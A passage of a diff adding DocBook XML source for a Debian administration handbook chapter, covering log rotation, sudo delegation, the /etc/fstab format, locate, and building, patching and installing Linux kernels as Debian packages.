+					<primary>GPS</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>DCF-77</primary>
+				</indexterm>
+				 <para>
+					If time synchronization is particularly crucial to your network, it is possible to equip a server with a GPS module (which will use the time from GPS satellites) or a DCF-77 module (which will sync time with the atomic clock near Frankfurt, Germany). In this case, the configuration of the NTP server is a little more complicated, and prior consultation of the documentation is an absolute necessity.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section id="sect.rotation-logs">
+			<title>Rotating Log Files</title>
+			 <indexterm>
+				<primary>file</primary>
+				<secondary>logs, rotation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>logs</primary>
+				<secondary>files, rotation</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>rotation of log files</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>logrotate</command></primary>
+			</indexterm>
+			 <para>
+				Log files can grow, fast, and it is necessary to archive them. The most common scheme is a rotating archive: the log file is regularly archived, and only the latest <replaceable>X</replaceable> archives are retained. <command>logrotate</command>, the program responsible for these rotations, follows directives given in the <filename>/etc/logrotate.conf</filename> file and all of the files in the <filename>/etc/logrotate.d/</filename> directory. The administrator may modify these files, if they wish to adapt the log rotation policy defined by Debian. The <citerefentry><refentrytitle>logrotate</refentrytitle>
+				 <manvolnum>1</manvolnum></citerefentry> man page describes all of the options available in these configuration files. You may want to increase the number of files retained in log rotation, or move the log files to a specific directory dedicated to archiving them rather than delete them. You could also send them by e-mail to archive them elsewhere.
+			</para>
+			 <para>
+				The <command>logrotate</command> program is executed daily by the <command>cron</command> scheduling program (described in <xref linkend="sect.task-scheduling-cron-atd" />).
+			</para>
+
+		</section>
+		 <section id="sect.sharing-admin-rights">
+			<title>Sharing Administrator Rights</title>
+			 <indexterm>
+				<primary>account</primary>
+				<secondary>administrator account</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>root</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>sudo</command></primary>
+			</indexterm>
+			 <para>
+				Frequently, several administrators work on the same network. Sharing the root passwords is not very elegant, and opens the door for abuse due to the anonymity such sharing creates. The solution to this problem is the <command>sudo</command> program, which allows certain users to execute certain commands with special rights. In the most common use case, <command>sudo</command> allows a trusted user to execute any command as root. To do so, the user simply executes <command>sudo <replaceable>command</replaceable></command> and authenticates using their personal password.
+			</para>
+			 <para>
+				When installed, the <emphasis role="pkg">sudo</emphasis> package gives full root rights to members of the <literal>sudo</literal> Unix group. To delegate other rights, the administrator must use the <command>visudo</command> command, which allows them to modify the <filename>/etc/sudoers</filename> configuration file (here again, this will invoke the <command>vi</command> editor, or any other editor indicated in the <varname>EDITOR</varname> environment variable). Adding a line with <literal><replaceable>username</replaceable> ALL=(ALL) ALL</literal> allows the user in question to execute any command as root.
+			</para>
+			 <indexterm>
+				<primary><command>visudo</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>sudoers</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/sudoers</filename></primary>
+			</indexterm>
+			 <para>
+				More sophisticated configurations allow authorization of only specific commands to specific users. All the details of the various possibilities are given in the <citerefentry><refentrytitle>sudoers</refentrytitle>
+				 <manvolnum>5</manvolnum></citerefentry> man page.
+			</para>
+
+		</section>
+		 <section id="sect.fstab-mount-points">
+			<title>List of Mount Points</title>
+			 <indexterm>
+				<primary>point, mount</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>mount point</primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Mounting and unmounting</title>
+			 <para>
+				In a Unix-like system such as Debian, files are organized in a single tree-like hierarchy of directories. The <filename>/</filename> directory is called the “root directory”; all additional directories are sub-directories within this root. “Mounting” is the action of including the content of a peripheral device (often a hard drive) into the system's general file tree. As a consequence, if you use a separate hard drive to store users' personal data, this disk will have to be “mounted” in the <filename>/home/</filename> directory. The root filesystem is always mounted at boot by the kernel; other devices are often mounted later during the startup sequence or manually with the <command>mount</command> command.
+			</para>
+			 <indexterm>
+				<primary><command>mount</command></primary>
+			</indexterm>
+			 <para>
+				Some removable devices are automatically mounted when connected, especially when using the GNOME, Plasma or other graphical desktop environments. Others have to be mounted manually by the user. Likewise, they must be unmounted (removed from the file tree). Normal users do not usually have permission to execute the <command>mount</command> and <command>umount</command> commands. The administrator can, however, authorize these operations (independently for each mount point) by including the <literal>user</literal> option in the <filename>/etc/fstab</filename> file.
+			</para>
+			 <para>
+				The <command>mount</command> command can be used without arguments (it then lists all mounted filesystems). The following parameters are required to mount or unmount a device. For the complete list, please refer to the corresponding man pages, <citerefentry><refentrytitle>mount</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry> and <citerefentry><refentrytitle>umount</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry>. For simple cases, the syntax is simple too: for example, to mount the <filename>/dev/sdc1</filename> partition, which has an ext3 filesystem, into the <filename>/mnt/tmp/</filename> directory, you would simply run <command>mount -t ext3 /dev/sdc1 /mnt/tmp/</command>.
+			</para>
+			 </sidebar> <para>
+				The <filename>/etc/fstab</filename> file gives a list of all possible mounts that happen either automatically on boot or manually for removable storage devices. Each mount point is described by a line with several space-separated fields: <indexterm><primary><filename>fstab</filename></primary></indexterm> <indexterm><primary><filename>/etc/fstab</filename></primary></indexterm>
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						file system: this indicates where the filesystem to be mounted can be found, it can be a local device (hard drive partition, CD-ROM) or a remote filesystem (such as NFS).
+					</para>
+					 <para>
+						This field is frequently replaced with the unique ID of the filesystem (which you can determine with <command>blkid <userinput>device</userinput></command>) prefixed with <literal>UUID=</literal>. This guards against a change in the name of the device in the event of addition or removal of disks, or if disks are detected in a different order.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						mount point: this is the location on the local filesystem where the device, remote system, or partition will be mounted.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						type: this field defines the filesystem used on the mounted device. <literal>ext4</literal>, <literal>ext3</literal>, <literal>vfat</literal>, <literal>ntfs</literal>, <literal>btrfs</literal>, <literal>xfs</literal> are a few examples.
+					</para>
+					 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> NFS, a network filesystem</title>
+					 <para>
+						NFS is a network filesystem; under Linux, it allows transparent access to remote files by including them in the local filesystem.
+					</para>
+					 </sidebar> <para>
+						A complete list of known filesystems is available in the <citerefentry><refentrytitle>mount</refentrytitle>
+						 <manvolnum>8</manvolnum></citerefentry> man page. The <literal>swap</literal> special value is for swap partitions; the <literal>auto</literal> special value tells the <command>mount</command> program to automatically detect the filesystem (which is especially useful for disk readers and USB keys, since each one might have a different filesystem);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						options: there are many of them, depending on the filesystem, and they are documented in the <command>mount</command> man page. The most common are
+					</para>
+					 <itemizedlist>
+						<listitem>
+							<para>
+								<literal>rw</literal> or <literal>ro</literal>, meaning, respectively, that the device will be mounted with read/write or read-only permissions.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<literal>noauto</literal> deactivates automatic mounting on boot.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<literal>nofail</literal> allows the boot to proceed even when the device is not present. Make sure to put this option for external drives that might be unplugged when you boot, because <command>systemd</command> really ensures that all mount points that must be automatically mounted are actually mounted before letting the boot process continue to its end. Note that you can combine this with <literal>x-systemd.device-timeout=5s</literal> to tell <command>systemd</command> to not wait more than 5 seconds for the device to appear (see <citerefentry><refentrytitle>systemd.mount</refentrytitle>
+								<manvolnum>5</manvolnum></citerefentry>).
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<literal>user</literal> authorizes all users to mount this filesystem (an operation which would otherwise be restricted to the root user).
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<literal>defaults</literal> means the group of default options: <literal>rw</literal>, <literal>suid</literal>, <literal>dev</literal>, <literal>exec</literal>, <literal>auto</literal>, <literal>nouser</literal> and <literal>async</literal>, each of which can be individually disabled after <literal>defaults</literal> by adding <literal>nosuid</literal>, <literal>nodev</literal> and so on to block <literal>suid</literal>, <literal>dev</literal> and so on. Adding the <literal>user</literal> option reactivates it, since <literal>defaults</literal> includes <literal>nouser</literal>.
+							</para>
+
+						</listitem>
+
+					</itemizedlist>
+
+				</listitem>
+				 <listitem>
+					<para>
+						dump: this field is almost always set to <literal>0</literal>. When it is <literal>1</literal>, it tells the <command>dump</command> tool that the partition contains data that is to be backed up.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						pass: this last field indicates whether the integrity of the filesystem should be checked on boot, and in which order this check should be executed. If it is <literal>0</literal>, no check is conducted. The root filesystem should have the value <literal>1</literal>, while other permanent filesystems get the value <literal>2</literal>.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <example id="example.fstab">
+				<title>Example <filename>/etc/fstab</filename> file</title>
+				 
+<programlisting>
+# /etc/fstab: static file system information.
+#
+# &lt;file system&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;dump&gt;  &lt;pass&gt;
+proc            /proc           proc    defaults        0       0
+# / was on /dev/sda1 during installation
+UUID=c964222e-6af1-4985-be04-19d7c764d0a7 / ext3 errors=remount-ro 0 1
+# swap was on /dev/sda5 during installation
+UUID=ee880013-0f63-4251-b5c6-b771f53bd90e none swap sw  0       0
+/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto 0       0
+/dev/fd0        /media/floppy   auto    rw,user,noauto  0       0
+arrakis:/shared /shared         nfs     defaults        0       0
+</programlisting>
+
+			</example>
+			 <para>
+				The last entry in this example corresponds to a network filesystem (NFS): the <filename>/shared/</filename> directory on the <emphasis>arrakis</emphasis> server is mounted at <filename>/shared/</filename> on the local machine. The format of the <filename>/etc/fstab</filename> file is documented on the <citerefentry><refentrytitle>fstab</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> man page.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Auto-mounting</title>
+			 <para>
+				systemd is able to manage automount points: those are filesystems that are mounted on-demand when a user attempts to access their target mount points. It can also unmount these filesystems when no process is accessing them any longer.
+			</para>
+			 <para>
+				Like most concepts in systemd, automount points are managed with dedicated units (using the <literal>.automount</literal> suffix). See <citerefentry><refentrytitle>systemd.automount</refentrytitle>
+				<manvolnum>5</manvolnum></citerefentry> for their precise syntax.
+			</para>
+			 <indexterm>
+				<primary><emphasis>am-utils</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>amd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>automount</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>autofs</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>automounter</primary>
+			</indexterm>
+			 <para>
+				Other auto-mounting utilities exist, such as <command>automount</command> in the <emphasis role="pkg">autofs</emphasis> package or <command>amd</command> in the <emphasis role="pkg">am-utils</emphasis>.
+			</para>
+			 <para>
+				Note also that GNOME, Plasma, and other graphical desktop environments work together with <emphasis>udisks</emphasis>, and can automatically mount removable media when they are connected.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.locate-updatedb">
+			<title><command>locate</command> and <command>updatedb</command></title>
+			 <indexterm>
+				<primary><command>locate</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>updatedb</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>mlocate</command></primary>
+			</indexterm>
+			 <para>
+				The <command>locate</command> command can find the location of a file when you only know part of the name. It sends a result almost instantaneously, since it consults a database that stores the location of all the files on the system; this database is updated daily by the <command>updatedb</command> command. There are multiple implementations of the <command>locate</command> command and Debian picked <emphasis role="pkg">mlocate</emphasis> for its standard system.
+			</para>
+			 <para>
+				<command>mlocate</command> is smart enough to only return files which are accessible to the user running the command even though it uses a database that knows about all files on the system (since its <command>updatedb</command> implementation runs with root rights). For extra safety, the administrator can use <varname>PRUNEDPATHS</varname> in <filename>/etc/updatedb.conf</filename> to exclude some directories from being indexed.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.kernel-compilation">
+		<title>Compiling a Kernel</title>
+		 <indexterm>
+			<primary>compilation</primary>
+			<secondary>of a kernel</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>kernel</primary>
+			<secondary>compilation</secondary>
+		</indexterm>
+		 <para>
+			The kernels provided by Debian include the largest possible number of features, as well as the maximum of drivers, in order to cover the broadest spectrum of existing hardware configurations. This is why some users prefer to recompile the kernel in order to only include what they specifically need. There are two reasons for this choice. First, it may be to optimize memory consumption, since the kernel code, even if it is never used, occupies memory for nothing (and never “goes down” on the swap space, since it is actual RAM that it uses), which can decrease overall system performance. A locally compiled kernel can also limit the risk of security problems since only a fraction of the kernel code is compiled and run.
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Security updates</title>
+		 <para>
+			If you choose to compile your own kernel, you must accept the consequences: Debian cannot ensure security updates for your custom kernel. By keeping the kernel provided by Debian, you benefit from updates prepared by the Debian Project's security team.
+		</para>
+		 </sidebar> <para>
+			Recompilation of the kernel is also necessary if you want to use certain features that are only available as patches (and not included in the standard kernel version).
+		</para>
+		 <sidebar> <title><emphasis>GOING FURTHER</emphasis> The Debian Kernel Handbook</title>
+		 <indexterm>
+			<primary><emphasis role="pkg">debian-kernel-handbook</emphasis></primary>
+		</indexterm>
+		 <para>
+			The Debian kernel teams maintains the “Debian Kernel Handbook” (also available in the <emphasis role="pkg">debian-kernel-handbook</emphasis> package) with comprehensive documentation about most kernel related tasks and about how official Debian kernel packages are handled. This is the first place you should look into if you need more information than what is provided in this section. <ulink type="block" url="https://kernel-team.pages.debian.net/kernel-handbook/" />
+		</para>
+		 </sidebar> <section id="sect.kernel-compilation-prerequisites">
+			<title>Introduction and Prerequisites</title>
+			 <para>
+				Unsurprisingly Debian manages the kernel in the form of a package, which is not how kernels have traditionally been compiled and installed. Since the kernel remains under the control of the packaging system, it can then be removed cleanly, or deployed on several machines. Furthermore, the scripts associated with these packages automate the interaction with the bootloader and the initrd generator.
+			</para>
+			 <para>
+				The upstream Linux sources contain everything needed to build a Debian package of the kernel. But you still need to install <emphasis role="pkg">build-essential</emphasis> to ensure that you have the tools required to build a Debian package. Furthermore, the configuration step for the kernel requires the <emphasis role="pkg">libncurses5-dev</emphasis> package. Finally, the <emphasis role="pkg">fakeroot</emphasis> package will enable creation of the Debian package without using administrator's rights.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> The good old days of <emphasis role="pkg">kernel-package</emphasis></title>
+			 <indexterm>
+				<primary><emphasis role="pkg">kernel-package</emphasis></primary>
+			</indexterm>
+			 <para>
+				Before the Linux build system gained the ability to build proper Debian packages, the recommended way to build such packages was to use <command>make-kpkg</command> from the <emphasis role="pkg">kernel-package</emphasis> package.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.kernel-sources">
+			<title>Getting the Sources</title>
+			 <indexterm>
+				<primary>Linux kernel sources</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>kernel</primary>
+				<secondary>sources</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>source</primary>
+				<secondary>of the Linux kernel</secondary>
+			</indexterm>
+			 <para>
+				Like anything that can be useful on a Debian system, the Linux kernel sources are available in a package. To retrieve them, just install the <emphasis role="pkg">linux-source-<replaceable>version</replaceable></emphasis> package. The <command>apt search ^linux-source</command> command lists the various kernel versions packaged by Debian. The latest version is available in the <emphasis role="distribution">Unstable</emphasis> distribution: you can retrieve them without much risk (especially if your APT is configured according to the instructions of <xref linkend="sect.apt-mix-distros" />). Note that the source code contained in these packages does not correspond precisely with that published by Linus Torvalds and the kernel developers; like all distributions, Debian applies a number of patches, which might (or might not) find their way into the upstream version of Linux. These modifications include backports of fixes/features/drivers from newer kernel versions, new features not yet (entirely) merged in the upstream Linux tree, and sometimes even Debian specific changes.
+			</para>
+			 <para>
+				The remainder of this section focuses on the 4.9 version of the Linux kernel, but the examples can, of course, be adapted to the particular version of the kernel that you want.
+			</para>
+			 <para>
+				We assume the <emphasis role="pkg">linux-source-4.9</emphasis> package has been installed. It contains <filename>/usr/src/linux-source-4.9.tar.xz</filename>, a compressed archive of the kernel sources. You must extract these files in a new directory (not directly under <filename>/usr/src/</filename>, since there is no need for special permissions to compile a Linux kernel): <filename>~/kernel/</filename> is appropriate.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>mkdir ~/kernel; cd ~/kernel</userinput>
+<computeroutput>$ </computeroutput><userinput>tar -xaf /usr/src/linux-source-4.9.tar.xz</userinput></screen>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Location of kernel sources</title>
+			 <para>
+				Traditionally, Linux kernel sources would be placed in <filename>/usr/src/linux/</filename> thus requiring root permissions for compilation. However, working with administrator rights should be avoided when not needed. There is a <literal>src</literal> group that allows members to work in this directory, but working in <filename>/usr/src/</filename> should be avoided nevertheless. By keeping the kernel sources in a personal directory, you get security on all counts: no files in <filename>/usr/</filename> unknown to the packaging system, and no risk of misleading programs that read <filename>/usr/src/linux</filename> when trying to gather information on the used kernel.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.config-kernel">
+			<title>Configuring the Kernel</title>
+			 <indexterm>
+				<primary>kernel</primary>
+				<secondary>configuration</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>configuration</primary>
+				<secondary>of the kernel</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>.config</filename></primary>
+			</indexterm>
+			 <para>
+				The next step consists of configuring the kernel according to your needs. The exact procedure depends on the goals.
+			</para>
+			 <para>
+				When recompiling a more recent version of the kernel (possibly with an additional patch), the configuration will most likely be kept as close as possible to that proposed by Debian. In this case, and rather than reconfiguring everything from scratch, it is sufficient to copy the <filename>/boot/config-<replaceable>version</replaceable></filename> file (the version is that of the kernel currently used, which can be found with the <command>uname -r</command> command) into a <filename>.config</filename> file in the directory containing the kernel sources.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>cp /boot/config-4.9.0-3-amd64 ~/kernel/linux-source-4.9/.config</userinput></screen>
+			 <para>
+				Unless you need to change the configuration, you can stop here and skip to <xref linkend="sect.kernel-build" />. If you need to change it, on the other hand, or if you decide to reconfigure everything from scratch, you must take the time to configure your kernel. There are various dedicated interfaces in the kernel source directory that can be used by calling the <command>make <replaceable>target</replaceable></command> command, where <replaceable>target</replaceable> is one of the values described below.
+			</para>
+			 <para>
+				<command>make menuconfig</command> compiles and executes a text-mode interface (this is where the <emphasis role="pkg">libncurses5-dev</emphasis> package is required) which allows navigating the options available in a hierarchical structure. Pressing the <keycap>Space</keycap> key changes the value of the selected option, and <keycap>Enter</keycap> validates the button selected at the bottom of the screen; <guibutton>Select</guibutton> returns to the selected sub-menu; <guibutton>Exit</guibutton> closes the current screen and moves back up in the hierarchy; <guibutton>Help</guibutton> will display more detailed information on the role of the selected option. The arrow keys allow moving within the list of options and buttons. To exit the configuration program, choose <guibutton>Exit</guibutton> from the main menu. The program then offers to save the changes you've made; accept if you are satisfied with your choices.
+			</para>
+			 <para>
+				Other interfaces have similar features, but they work within more modern graphical interfaces; such as <command>make xconfig</command> which uses a Qt graphical interface, and <command>make gconfig</command> which uses GTK+. The former requires <emphasis role="pkg">libqt4-dev</emphasis>, while the latter depends on <emphasis role="pkg">libglade2-dev</emphasis> and <emphasis role="pkg">libgtk2.0-dev</emphasis>.
+			</para>
+			 <para>
+				When using one of those configuration interfaces, it is always a good idea to start from a reasonable default configuration. The kernel provides such configurations in <filename>arch/<replaceable>arch</replaceable>/configs/*_defconfig</filename> and you can put your selected configuration in place with a command like <command>make x86_64_defconfig</command> (in the case of a 64-bit PC) or <command>make i386_defconfig</command> (in the case of a 32-bit PC).
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Dealing with outdated <filename>.config</filename> files</title>
+			 <para>
+				When you provide a <filename>.config</filename> file that has been generated with another (usually older) kernel version, you will have to update it. You can do so with <command>make oldconfig</command>, it will interactively ask you the questions corresponding to the new configuration options. If you want to use the default answer to all those questions you can use <command>make olddefconfig</command>. With <command>make oldnoconfig</command>, it will assume a negative answer to all questions.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.kernel-build">
+			<title>Compiling and Building the Package</title>
+			 <indexterm>
+				<primary><command>make deb-pkg</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Clean up before rebuilding</title>
+			 <para>
+				If you have already compiled once in the directory and wish to rebuild everything from scratch (for example because you substantially changed the kernel configuration), you will have to run <command>make clean</command> to remove the compiled files. <command>make distclean</command> removes even more generated files, including your <filename>.config</filename> file too, so make sure to backup it first.
+			</para>
+			 </sidebar> <para>
+				Once the kernel configuration is ready, a simple <command>make deb-pkg</command> will generate up to 5 Debian packages: <emphasis role="pkg">linux-image-<replaceable>version</replaceable></emphasis> that contains the kernel image and the associated modules, <emphasis role="pkg">linux-headers-<replaceable>version</replaceable></emphasis> which contains the header files required to build external modules, <emphasis role="pkg">linux-firmware-image-<replaceable>version</replaceable></emphasis> which contains the firmware files needed by some drivers (this package might be missing when you build from the kernel sources provided by Debian), <emphasis role="pkg">linux-image-<replaceable>version</replaceable>-dbg</emphasis> which contains the debugging symbols for the kernel image and its modules, and <emphasis role="pkg">linux-libc-dev</emphasis> which contains headers relevant to some user-space libraries like GNU glibc.
+			</para>
+			 <para>
+				The <replaceable>version</replaceable> is defined by the concatenation of the upstream version (as defined by the variables <literal>VERSION</literal>, <literal>PATCHLEVEL</literal>, <literal>SUBLEVEL</literal> and <literal>EXTRAVERSION</literal> in the <filename>Makefile</filename>), of the <literal>LOCALVERSION</literal> configuration parameter, and of the <literal>LOCALVERSION</literal> environment variable. The package version reuses the same version string with an appended revision that is regularly incremented (and stored in <filename>.version</filename>), except if you override it with the <literal>KDEB_PKGVERSION</literal> environment variable.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>make deb-pkg LOCALVERSION=-falcot KDEB_PKGVERSION=$(make kernelversion)-1
+</userinput><computeroutput>[...]
+$ </computeroutput><userinput>ls ../*.deb
+</userinput><computeroutput>../linux-headers-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot-dbg_4.9.30-1_amd64.deb
+../linux-libc-dev_4.9.30-1_amd64.deb
+</computeroutput></screen>
+
+		</section>
+		 <section id="sect.modules-build">
+			<title>Compiling External Modules</title>
+			 <indexterm>
+				<primary>kernel</primary>
+				<secondary>external modules</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>modules</primary>
+				<secondary>external kernel modules</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>dkms</command></primary>
+			</indexterm>
+			 <para>
+				Some modules are maintained outside of the official Linux kernel. To use them, they must be compiled alongside the matching kernel. A number of common third party modules are provided by Debian in dedicated packages, such as <emphasis role="pkg">xtables-addons-source</emphasis> (extra modules for iptables) or <emphasis role="pkg">oss4-source</emphasis> (Open Sound System, some alternative audio drivers).
+			</para>
+			 <para>
+				These external packages are many and varied and we won't list them all here; the <command>apt-cache search source$</command> command can narrow down the search field. However, a complete list isn't particularly useful since there is no particular reason for compiling external modules except when you know you need it. In such cases, the device's documentation will typically detail the specific module(s) it needs to function under Linux.
+			</para>
+			 <para>
+				For example, let's look at the <emphasis role="pkg">xtables-addons-source</emphasis> package: after installation, a <filename>.tar.bz2</filename> of the module's sources is stored in <filename>/usr/src/</filename>. While we could manually extract the tarball and build the module, in practice we prefer to automate all this using DKMS. Most modules offer the required DKMS integration in a package ending with a <literal>-dkms</literal> suffix. In our case, installing <emphasis role="pkg">xtables-addons-dkms</emphasis> is all that is needed to compile the kernel module for the current kernel provided that we have the <emphasis role="pkg">linux-headers-*</emphasis> package matching the installed kernel. For instance, if you use <emphasis role="pkg">linux-image-amd64</emphasis>, you would also install <emphasis role="pkg">linux-headers-amd64</emphasis>.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>sudo apt install xtables-addons-dkms</userinput>
+<computeroutput>
+[...]
+Setting up xtables-addons-dkms (2.12-0.1) ...
+Loading new xtables-addons-2.12 DKMS files...
+Building for 4.9.0-3-amd64
+Building initial module for 4.9.0-3-amd64
+Done.
+
+xt_ACCOUNT:
+Running module version sanity check.
+ - Original module
+   - No original module exists within this kernel
+ - Installation
+   - Installing to /lib/modules/4.9.0-3-amd64/updates/dkms/
+[...]
+DKMS: install completed.
+$ </computeroutput><userinput>sudo dkms status</userinput>
+<computeroutput>xtables-addons, 2.12, 4.9.0-3-amd64, x86_64: installed
+$ </computeroutput><userinput>sudo modinfo xt_ACCOUNT</userinput>
+<computeroutput>filename:       /lib/modules/4.9.0-3-amd64/updates/dkms/xt_ACCOUNT.ko
+license:        GPL
+alias:          ipt_ACCOUNT
+author:         Intra2net AG &lt;opensource@intra2net.com&gt;
+description:    Xtables: per-IP accounting for large prefixes
+[...]
+</computeroutput></screen>
+			 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> module-assistant</title>
+			 <indexterm>
+				<primary><emphasis role="pkg">module-assistant</emphasis></primary>
+			</indexterm>
+			 <para>
+				Before DKMS, <emphasis role="pkg">module-assistant</emphasis> was the simplest solution to build and deploy kernel modules. It can still be used, in particular for packages lacking DKMS integration: with a simple command like <command>module-assistant auto-install xtables-addons</command> (or <command>m-a a-i xtables-addons</command> for short), the modules are compiled for the current kernel, put in a new Debian package, and that package gets installed on the fly.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.kernel-patch">
+			<title>Applying a Kernel Patch</title>
+			 <indexterm>
+				<primary>kernel</primary>
+				<secondary>patch</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>patch of the kernel</primary>
+			</indexterm>
+			 <para>
+				Some features are not included in the standard kernel due to a lack of maturity or to some disagreement with the kernel maintainers. Such features may be distributed as patches that anyone is then free to apply to the kernel sources.
+			</para>
+			 <para>
+				Debian sometimes provides some of these patches in <emphasis role="pkg">linux-patch-*</emphasis> packages but they often don't make it into stable releases (sometimes for the very same reasons that they are not merged into the official upstream kernel). These packages install files in the <filename>/usr/src/kernel-patches/</filename> directory.
+			</para>
+			 <para>
+				To apply one or more of these installed patches, use the <command>patch</command> command in the sources directory then start compilation of the kernel as described above.
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>cd ~/kernel/linux-source-4.9</userinput>
+<computeroutput>$ </computeroutput><userinput>make clean</userinput>
+<computeroutput>$ </computeroutput><userinput>zcat /usr/src/kernel-patches/diffs/grsecurity2/grsecurity-3.1-4.9.11-201702181444.patch.gz | patch -p1</userinput></screen>
+			 <para>
+				Note that a given patch may not necessarily work with every version of the kernel; it is possible for <command>patch</command> to fail when applying them to kernel sources. An error message will be displayed and give some details about the failure; in this case, refer to the documentation available in the Debian package of the patch (in the <filename>/usr/share/doc/linux-patch-*/</filename> directory). In most cases, the maintainer indicates for which kernel versions their patch is intended.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.kernel-installation">
+		<title>Installing a Kernel</title>
+		 <indexterm>
+			<primary>installation</primary>
+			<secondary>of a kernel</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>kernel</primary>
+			<secondary>installation</secondary>
+		</indexterm>
+		 <section id="sect.kernel-package">
+			<title>Features of a Debian Kernel Package</title>
+			 <indexterm>
+				<primary><filename>vmlinuz</filename></primary>
+			</indexterm>
+			 <para>
+				A Debian kernel package installs the kernel image (<filename>vmlinuz-<replaceable>version</replaceable></filename>), its configuration (<filename>config-<replaceable>version</replaceable></filename>) and its symbols table (<filename>System.map-<replaceable>version</replaceable></filename>) in <filename>/boot/</filename>. The symbols table helps developers understand the meaning of a kernel error message; without it, kernel “oopses” (an “oops” is the kernel equivalent of a segmentation fault for user-space programs, in other words messages generated following an invalid pointer dereference) only contain numeric memory addresses, which is useless information without the table mapping these addresses to symbols and function names. The modules are installed in the <filename>/lib/modules/<replaceable>version</replaceable>/</filename> directory.
+			</para>
+			 <para>
+				The package's configuration scripts automatically generate an initrd image, which is a mini-system designed to be loaded in memory (hence the name, which stands for “init ramdisk”) by the bootloader, and used by the Linux kernel solely for loading the modules needed to access the devices containing the complete Debian system (for example, the driver for SATA disks). Finally, the post-installation scripts update the symbolic links <filename>/vmlinuz</filename>, <filename>/vmlinuz.old</filename>, <filename>/initrd.img</filename> and <filename>/initrd.img.old</filename> so that they point to the latest two kernels installed, respectively, as well as the corresponding initrd images.
+			</para>
+			 <para>
+				Most of those tasks are offloaded to hook scripts in the <filename>/etc/kernel/*.d/</filename> directories. For instance, the integration with <command>grub</command> relies on <filename>/etc/kernel/postinst.d/zz-update-grub</filename> and <filename>/etc/kernel/postrm.d/zz-update-grub</filename> to call <command>update-grub</command> when kernels are installed or removed.
+			</para>
+
+		</section>
+		 <section id="sect.kernel-installation-with-dpkg">
+			<title>Installing with <command>dpkg</command></title>
+			 <para>
+				Using <command>apt</command> is so convenient that it makes it easy to forget about the lower-level tools, but the easiest way of installing a compiled kernel is to use a command such as <command>dpkg -i <replaceable>package</replaceable>.deb</command>, where <literal><replaceable>package</replaceable>.deb</literal> is the name of a <emphasis role="pkg">linux-image</emphasis> package such as <filename>linux-image-4.9.30-ckt4-falcot_1_amd64.deb</filename>.
+			</para>
+			 <para>
+				The configuration steps described in this chapter are basic and can lead both to a server system or a workstation, and it can be massively duplicated in semi-automated ways. However, it is not enough by itself to provide a fully configured system. A few pieces are still in need of configuration, starting with low-level programs known as the “Unix services”.
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
